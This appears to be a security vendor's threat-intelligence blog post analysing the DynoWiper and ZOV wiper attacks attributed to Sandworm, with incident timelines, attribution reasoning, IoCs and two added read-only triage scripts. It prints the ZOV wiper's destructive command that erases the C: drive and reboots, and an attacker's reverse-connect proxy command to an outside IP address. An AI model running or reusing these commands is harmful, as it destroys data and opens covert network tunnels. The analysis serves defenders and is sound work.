In this blog post, we provide additional technical details related to our earlier DynoWiper publication.

Key points of the report:

  • ESET researchers identified new data-wiping malware that we have named DynoWiper, used against an energy company in Poland.
  • The tactics, techniques, and procedures (TTPs) observed during the DynoWiper incident closely resemble those seen earlier this year in an incident involving the ZOV wiper in Ukraine; Z, O, and V are Russian military symbols.
  • We attribute DynoWiper to Sandworm with medium confidence, in contrast to the ZOV wiper, which we attribute to Sandworm with high confidence.

Sandworm profile

Sandworm is a Russia-aligned threat group that performs destructive attacks. It is mostly known for its attacks against Ukrainian energy companies in December 2015 and December 2016, which resulted in power outages. In June 2017, Sandworm launched the NotPetya data-wiping attack, which used a supply-chain vector by compromising the Ukrainian accounting software M.E.Doc. In February 2018, Sandworm launched the Olympic Destroyer data-wiping attack against the organizers of the 2018 Winter Olympics in Pyeongchang.

The Sandworm group uses such advanced malware as Industroyer, which is able to communicate with equipment at energy companies via industrial control protocols. In April 2022, CERT-UA thwarted an attack against an energy company in Ukraine where the Sandworm group attempted to deploy a new variant of this malware, Industroyer2.

In October 2020, the US Department of Justice published an indictment against six Russian computer hackers that it alleges prepared and performed various Sandworm attacks. The group is commonly attributed to Unit 74455 of the Russian Main Intelligence Directorate (GRU).

History of Sandworm's destructive operations

Sandworm is a threat actor known for conducting destructive cyberattacks, targeting a wide range of entities including government agencies, logistics companies, transportation firms, energy providers, media organizations, grain sector companies, and telecommunications companies. These attacks often involve the deployment of wiper malware: malicious software designed to delete files, erase data, and render systems unbootable.

Its operators have a long history of conducting such cyberattacks, and we have documented their activity extensively. In this blog post, we focus on their recent operations involving data-wiping malware.

To evade detection by security products, Sandworm often modifies the destructive malware it deploys, sometimes by introducing minor changes or by producing newly compiled variants from the original source code, and other times by abandoning a particular wiper altogether and switching to an entirely new malware family for its operations. We rarely see Sandworm attempt to deploy a destructive malware sample that was used in an earlier attack (for example, one with a known hash) or one that is already detected at the time of deployment.

Since February 2022, we have been thoroughly monitoring incidents involving destructive malware and have publicly documented our findings in reports such as A year of wiper attacks in Ukraine. Over time, Sandworm has deployed a wide range of destructive malware families, including, in roughly chronological order, HermeticWiper, HermeticRansom, CaddyWiper, DoubleZero, ARGUEPATCH, ORCSHRED, SOLOSHRED, AWFULSHRED, Prestige ransomware, RansomBoggs ransomware, SDelete-based wipers, BidSwipe, ROARBAT, SwiftSlicer, NikoWiper, SharpNikoWiper, ZEROLOT, Sting wiper, and ZOV wiper. It should be noted that some of these malware families were deployed multiple times across a variety of incidents. In 2025, ESET investigated more than 10 incidents involving destructive malware attributed to Sandworm, almost all of them occurring in Ukraine.

We continuously enhance our products to improve early detection of Sandworm operations, ideally identifying activity before destructive wipers are deployed and, whenever possible, preventing damage even when previously unknown destructive malware is executed. Because the majority of Sandworm's cyberattacks currently target Ukraine, we collaborate closely with our Ukrainian partners, including the Computer Emergency Response Team of Ukraine (CERT-UA), to support both prevention and remediation efforts.

Apart from Ukraine, Sandworm has a decade-long history of targeting companies in Poland, including those in the energy sector. Typically, these operations have been conducted covertly for cyberespionage purposes, as seen in the BlackEnergy and GreyEnergy cases. Notably, we detected the first deployment of GreyEnergy malware at a Polish energy company back in 2015.

However, since the start of Russia's full-scale invasion of Ukraine, Sandworm has changed its tactics regarding targets in Poland. Specifically, in October 2022, it carried out a destructive attack against logistics companies in both Ukraine and Poland, disguising the operation as a Prestige ransomware incident. Microsoft Threat Intelligence reported on the Prestige ransomware incidents, which they attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Prestige ransomware family and publicly attributed this activity to Sandworm.

In December 2025, we detected the deployment of a destructive malware sample, which we named DynoWiper, at an energy company in Poland. The installed EDR/XDR product, ESET PROTECT, blocked execution of the wiper, significantly limiting its impact in the environment. In this blog post, we reveal additional details about this activity and outline our attribution process.

CERT Polska did an excellent job investigating the incident and published a detailed analysis in a report available on its website.

DynoWiper

On December 29th, 2025, DynoWiper samples were deployed to the C:\inetpub\pub directory, which is likely a shared directory in the victim's domain, with the following filenames: schtask.exe, schtask2.exe, and <redacted>_update.exe. The schtask*.exe samples contain the PDB path C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb. The username vagrant corresponds to a tool called Vagrant, which can be used to manage virtual machines. This suggests that the machine used to build the wiper is a Vagrant box or, more likely, a host system that manages virtual machines using Vagrant. It is therefore possible that Sandworm operators first tested the operation on virtual machines before deploying the malware in the target organization.

The attackers initially deployed <redacted>_update.exe (PE timestamp: 2025-12-26 13:51:11). When this attempt failed, they modified the wiper code, built it, and then deployed schtask.exe (PE timestamp: 2025-12-29 13:17:06). This attempt also appears to have been unsuccessful, so they rebuilt the wiper with slightly modified code, resulting in schtask2.exe (PE timestamp: 2025-12-29 14:10:07). It is likely that even this final attempt failed. All three samples were deployed on the same day, December 29th, 2025. ESET PROTECT was installed on the targeted machines and appears to have interfered with the execution of all three variants.

DynoWiper's workflow can be divided into three distinct phases, which are described later in the text. The schtask*.exe samples include only the first two phases and introduce a five-second delay between them. In contrast, <redacted>_update.exe implements all three phases and does not include the five-second delay.

The wiper overwrites files using a 16-byte buffer that contains random data generated once at the start of the wiper's execution. Files of size 16 bytes or fewer are entirely overwritten, with smaller files being extended to 16 bytes. To speed up the destruction process, other files (larger than 16 bytes) have only some parts of their contents overwritten.

During the first phase, the malware recursively wipes files on all removable and fixed drives, excluding specific directories (using case-insensitive comparison):

  • system32
  • windows
  • program files
  • program files(x86) (a space is missing before the open bracket)
  • temp
  • recycle.bin
  • $recycle.bin
  • boot
  • perflogs
  • appdata
  • documents and settings

For <redacted>_update.exe and schtask.exe, the second phase behaves similarly, but this time the previously excluded directories are not skipped in the root directory (e.g., C:\). As a result, a path like C:\Windows is no longer excluded, whereas C:\Windows\System32 still is. For schtask2.exe, in the second phase, all files and directories on removable and fixed drives are removed via the DeleteFileW API without skipping any directories and without overwriting files.

The third phase forces the system to reboot, completing the destruction of the system.

Unlike Industroyer and Industroyer2, the discovered DynoWiper samples focus solely on the IT environment, with no observed functionality targeting OT (operational technology) industrial components. However, this does not exclude the possibility that such capabilities were present elsewhere in the attack chain.

Other tools deployed

We identified additional tools used within the same network prior to deployment of the wiper.

In early stages of the attack, the attackers attempted to download the publicly available Rubeus tool. The following path was used: c:\users\<USERNAME>\downloads\rubeus.exe.

In early December 2025, the attackers attempted to dump the LSASS process using Windows Task Manager. Additionally, they attempted to download and launch a publicly available SOCKS5 proxy tool called rsocx. The attackers tried to execute this proxy in reverse-connect mode using the command line C:\Users\<USERNAME>\Downloads\r.exe -r 31.172.71[.]5:8008. This server is used by ProGame (progamevl[.]ru), a programming school for kids in Vladivostok, Russia, and was likely compromised.
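As an added illustration (not ESET's tooling or the malware's code), the following Python model encodes the directory exclusion rules described above for each phase and sample, so a responder can scope which paths a given sample would have reached; the sample paths are constructed and the sample names are those reported.

```python
from pathlib import PureWindowsPath

# Directory names DynoWiper skips during phase 1, compared case-insensitively,
# as listed in the report. "program files(x86)" keeps its missing space, so the
# real "Program Files (x86)" directory never matches and is NOT protected.
EXCLUDED_DIRS = {
    "system32", "windows", "program files", "program files(x86)", "temp",
    "recycle.bin", "$recycle.bin", "boot", "perflogs", "appdata",
    "documents and settings",
}

def _dir_names(path):
    """Lower-cased directory names between the drive root and the file name."""
    parts = PureWindowsPath(path).parts      # ('C:\\', 'Windows', ..., 'file')
    return [p.lower() for p in parts[1:-1]]

def wiped_in_phase1(path):
    """Phase 1 recurses from each drive root and skips any directory whose name
    is in EXCLUDED_DIRS, so a file is reached only if no ancestor matches."""
    return not any(d in EXCLUDED_DIRS for d in _dir_names(path))

def wiped_in_phase2(path, sample):
    """Phase 2 depends on the sample:
    - schtask2.exe deletes everything via DeleteFileW, skipping nothing;
    - <redacted>_update.exe and schtask.exe keep the list but no longer apply
      it to directories directly under the root, so C:\\Windows is reached
      while C:\\Windows\\System32 is still skipped."""
    if sample == "schtask2.exe":
        return True
    return not any(d in EXCLUDED_DIRS for d in _dir_names(path)[1:])

def affected_phases(path, sample):
    """Phases (1 and/or 2) in which the given sample would reach this file."""
    phases = []
    if wiped_in_phase1(path):
        phases.append(1)
    if wiped_in_phase2(path, sample):
        phases.append(2)
    return phases

if __name__ == "__main__":
    # Constructed paths, not taken from the incident.
    for p in [r"C:\Users\alice\report.docx", r"C:\Windows\notepad.exe",
              r"C:\Windows\System32\kernel32.dll",
              r"C:\Program Files (x86)\App\app.exe", r"C:\Temp\x.tmp"]:
        for s in ("schtask.exe", "schtask2.exe"):
            print(f"{s:13} {p:40} phases={affected_phases(p, s)}")
```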

ZOV wiper

We identified several similarities to previously known destructive malware, specifically to the wiper we have named ZOV, which we attribute to Sandworm with high confidence. DynoWiper operates in a broadly similar fashion to the ZOV wiper. Notably, the exclusion of certain directories and especially the clear, separate logic present in the code for wiping smaller and larger files can also be found in the ZOV wiper.

ZOV is destructive malware that we detected being deployed against a financial institution in Ukraine in November 2025.

Once executed, the ZOV wiper iterates over files on all fixed drives and wipes them by overwriting their contents. It skips files in these directories:

  • $Recycle.Bin
  • AppData
  • Application Data
  • Program Files
  • Program Files (x86)
  • Temp
  • Windows
  • Windows.old

How a file is wiped depends on its size. To destroy data as quickly as possible, files smaller than 4,098 bytes have their entire contents overwritten; larger files have only some parts of their contents overwritten. The buffer, which is repeatedly written to files, is 4,098 bytes in size and begins with the string ZOV (referring to the Russian military symbols) followed by null bytes.

After completing this fast wipe, it prints how many directories and files were wiped, and runs the shell command time /t & ver & rmdir C:\ /s /q && dir && shutdown /r (print the current local time and Windows version, erase the contents of the C: drive, list the current working directory, and initiate a system reboot).

Right before exiting, the wiper drops an image from its resources to %appdata%\LocWall.jpg and sets it as the desktop background. As shown in Figure 1, the wallpaper also has the ZOV symbol.

Figure 1. Wallpaper dropped by the ZOV wiper

There was another ZOV wiper case at an energy company in Ukraine, where the attackers deployed the wiper on January 25th, 2024. In the observed sample, the buffer that is written to files does not contain the ZOV symbol. Instead, it contains the single character P followed by null bytes. Also, the text in the dropped image (see Figure 2) resembles a ransom note but refers to a nonexistent Bitcoin address.

Figure 2. Wallpaper dropped by the ZOV wiper (2024 case)
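As an added, read-only triage helper (not ESET's tooling or the wiper's code), this Python script classifies file contents against the ZOV buffer layouts described above, for the 2025 "ZOV" case and the 2024 "P" case, so responders can separate fully wiped small files from intact ones; the sample files it creates are constructed.

```python
import tempfile
from pathlib import Path

ZOV_BUFFER_SIZE = 4098
# Leading marker of the 4,098-byte overwrite buffer in each reported ZOV case;
# the rest of the buffer is null bytes. The one-byte "P" marker of the 2024
# case is a weak signal on its own, so treat that label as a lead, not proof.
ZOV_MARKERS = {"ZOV-2025": b"ZOV", "ZOV-2024": b"P"}

def zov_buffer(marker):
    """Rebuild the full buffer layout: marker followed by null bytes."""
    return marker + b"\x00" * (ZOV_BUFFER_SIZE - len(marker))

def classify_zov(data):
    """Classify file contents as a variant label, "intact", or "undetermined".
    Files of 4,098 bytes or more are only partially overwritten, at positions
    the report does not give, so they cannot be judged from content alone."""
    if not data or len(data) >= ZOV_BUFFER_SIZE:
        return "undetermined"
    for label, marker in ZOV_MARKERS.items():
        if len(data) < len(marker):
            continue                      # too short to even hold the marker
        if data == zov_buffer(marker)[:len(data)]:
            return label
    return "intact"

def triage_directory(root):
    """Read-only walk of root; returns {label: count} over regular files."""
    counts = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            label = classify_zov(path.read_bytes())
            counts[label] = counts.get(label, 0) + 1
    return counts

def demo():
    """Write a constructed sample tree into a temp directory and triage it."""
    root = tempfile.mkdtemp(prefix="zov-triage-")
    samples = {
        "notes.txt": b"ZOV" + b"\x00" * 200,           # small file, 2025 layout
        "old.cfg": b"P" + b"\x00" * 40,                 # small file, 2024 layout
        "readme.md": b"quarterly figures attached\n",  # untouched file
        "big.bin": b"ZOV" + b"\x00" * 8000,             # 4,098 bytes or more
    }
    for name, data in samples.items():
        Path(root, name).write_bytes(data)
    return triage_directory(root)

if __name__ == "__main__":
    print(demo())
```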

Destructive malware deployment methods

Sandworm often abuses Active Directory Group Policy to deploy its data-wiping malware across all machines within a compromised network. Domain-wide GPO deployment typically requires Domain Admin privileges and is usually staged from a domain controller. This activity underscores Sandworm's sophistication and its proven ability to obtain high-privilege Active Directory access across many intrusions.

During the incident response to the Industroyer2 attack in April 2022, CERT-UA discovered a PowerShell script they named POWERGAP. Sandworm had been using this script frequently to deploy various data-wiping malware across multiple organizations. Later, in November 2022, ESET researchers found that the same script had been used to distribute the RansomBoggs ransomware in Ukraine. However, at some point Sandworm stopped using this deployment script, yet continued deploying destructive malware via Active Directory Group Policy.

Interestingly, during the analysis of the ZOV wiper incident, we identified a newer PowerShell script used to deploy the ZOV wiper. This script contains hardcoded variables specific to the victim's environment, including the domain controller name, domain name, Group Policy Object (GPO) name, deployed filename, file path, GPO link string, and scheduled task name. Once executed, the script performs all necessary actions to distribute the malicious binary to users and computers across the entire domain.

More significantly, a deployment script with very similar functionality, but without strong code similarity, was discovered being used to deploy the DynoWiper malware in a Polish energy company. In that case, however, the malicious binary was not distributed to individual computers but was instead executed directly from a shared network directory.

As mentioned above, operations of this data-wiping nature commonly require a threat actor to possess Domain Admin privileges. Once a threat actor reaches this level of access, defending the environment becomes extremely difficult, as they can perform nearly any action within the domain. Some organizations, particularly in the energy sector, also deliberately segment or isolate parts of their IT/OT environments to meet operational and safety requirements. While this isolation can be a reasonable risk-management choice, it often reduces defender visibility and can slow evidence collection and response workflows, which in turn can complicate incident investigation and result in lower-confidence attribution.

Attribution

We attribute DynoWiper to Sandworm with medium confidence. The following factors support our assessment:

  • There is a strong overlap between the TTPs observed in this activity and those typically associated with Sandworm operations. Specifically, the use of data-wiping malware and its deployment via Active Directory Group Policy are both techniques commonly employed by Sandworm. As described above, we identified similarities in both the wipers used and the Group Policy deployment script when comparing this case to previous Sandworm activity.
  • The targeted industry aligns with Sandworm's typical interests. This group frequently targets energy companies and has a proven track record of attacking OT environments.
  • Historically, Sandworm has targeted Polish energy companies for cyberespionage purposes, using the BlackEnergy and GreyEnergy malware families.
  • We are not aware of any other recently active threat actors that have used data-wiping malware in their operations against targets in European Union countries.

The following factors contradict a Sandworm attribution:

Although Sandworm has previously targeted companies in Poland, it typically did so covertly, either for cyberespionage purposes only or by disguising its data-wiping activity as a ransomware attack, such as in the Prestige ransomware incidents. It is worth noting that we only attribute the data-wiping component of this activity to Sandworm with medium confidence. We do not have visibility into the initial access method used in this incident and therefore cannot assess how or by whom the first steps were carried out. In particular, the preparatory stages leading up to the destructive activity may have been conducted by another threat actor group collaborating with Sandworm. Notably, in 2025 we observed and confirmed that the UAC-0099 group performed initial access operations against targets in Ukraine and subsequently handed off validated targets to Sandworm for follow-up activity.

Conclusion

This incident represents a rare and previously unseen case in which a Russia-aligned threat actor deployed destructive, data-wiping malware against an energy company in Poland.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

| SHA-1 | Filename | Detection | Description |
|---|---|---|---|
| 472CA448F82A7FF6F373A32FDB9586FD7C38B631 | TMP_Backup.tmp.exe | Win32/KillFiles.NMJ | ZOV wiper. |
| 4F8E9336A784A196353023133E0F8FA54F6A92E2 | TS_5WB.tmp.exe | Win32/KillFiles.NMJ | ZOV wiper. |
| 4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6 | <redacted>_update.exe | Win32/KillFiles.NMO | DynoWiper. |
| 86596A5C5B05A8BFBD14876DE7404702F7D0D61B | schtask.exe | Win32/KillFiles.NMO | DynoWiper. |
| 69EDE7E341FD26FA0577692B601D80CB44778D93 | schtask2.exe | Win32/KillFiles.NMO | DynoWiper. |
| 9EC4C38394EA2048CA81D48B1BD66DE48D8BD4E8 | rsocx.exe | Win64/HackTool.Rsocx.A | rsocx SOCKS5 proxy tool. |
| 410C8A57FE6E09EDBFEBABA7D5D3E4797CA80A19 | Rubeus.exe | MSIL/Riskware.Rubeus.A | Rubeus toolset for Kerberos attacks. |

Network

| IP | Domain | Hosting provider | First seen | Details |
|---|---|---|---|---|
| 31.172.71[.]5 | N/A | Fornex Hosting S.L. | 2024-10-27 | SOCKS5 server. |

MITRE ATT&CK techniques

This table was built using version 18 of the MITRE ATT&CK framework.

| Tactic | ID | Name | Description |
|---|---|---|---|
| Resource Development | T1584.004 | Compromise Infrastructure: Server | A likely compromised server was used to host a SOCKS5 server. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Sandworm used PowerShell scripts for deployment in the target organizations. |
| Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The ZOV wiper runs a shell command via cmd.exe to gather information, remove files and directories, and schedule a system reboot. |
| Execution | T1053.005 | Scheduled Task/Job: Scheduled Task | The ZOV wiper and DynoWiper are executed using Windows scheduled tasks. |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | The attackers attempted to dump LSASS process memory using Windows Task Manager. |
| Discovery | T1083 | File and Directory Discovery | The ZOV wiper and DynoWiper search for files and directories in order to wipe them. |
| Discovery | T1680 | Local Storage Discovery | The ZOV wiper and DynoWiper identify additional disks present on the system in order to subsequently wipe data on them. |
| Discovery | T1082 | System Information Discovery | The ZOV wiper prints the Windows version of the operating system. |
| Discovery | T1124 | System Time Discovery | The ZOV wiper prints the current local time. |
| Command and Control | T1105 | Ingress Tool Transfer | The attackers attempted to download Rubeus and rsocx in the target organization. |
| Command and Control | T1090.002 | Proxy: External Proxy | The attackers attempted to create a connection with an external proxy using rsocx. |
| Impact | T1561.001 | Disk Wipe: Disk Content Wipe | The ZOV wiper and DynoWiper overwrite the contents of files. |
| Impact | T1529 | System Shutdown/Reboot | The ZOV wiper and DynoWiper reboot the system after the wiping process is complete. |


